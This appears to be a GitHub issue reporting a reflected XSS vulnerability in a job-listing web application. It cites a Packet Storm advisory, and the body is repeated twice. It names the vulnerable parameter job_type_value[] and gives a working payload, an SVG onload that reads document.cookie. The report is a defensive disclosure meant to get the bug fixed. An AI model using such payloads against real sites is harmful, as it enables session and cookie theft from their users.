Open jamesdwilson opened 3 years ago
I was able to reproduce this XSS from a post I found on packetnews: https://packetstormsecurity.com/files/152246/ Can you please test this and other issues as I linked above? I was personally unable to verify the others but this one I was.
Thank you.
Request: http://localhost/[PATH]/jobs?_=1&job_type_value[]=Full%20time&srch_location_val[]=fulltime_ctype Vulnerable Parameter: job_type_value[] (GET) Payload: "><svg+onload%3Dalert(document.cookie)>
I was able to reproduce this XSS from a post I found on packetnews: https://packetstormsecurity.com/files/152246/ Can you please test this and other issues as I linked above? I was personally unable to verify the others but this one I was.
Thank you.
Request: http://localhost/[PATH]/jobs?_=1&job_type_value[]=Full%20time&srch_location_val[]=fulltime_ctype Vulnerable Parameter: job_type_value[] (GET) Payload: "><svg+onload%3Dalert(document.cookie)>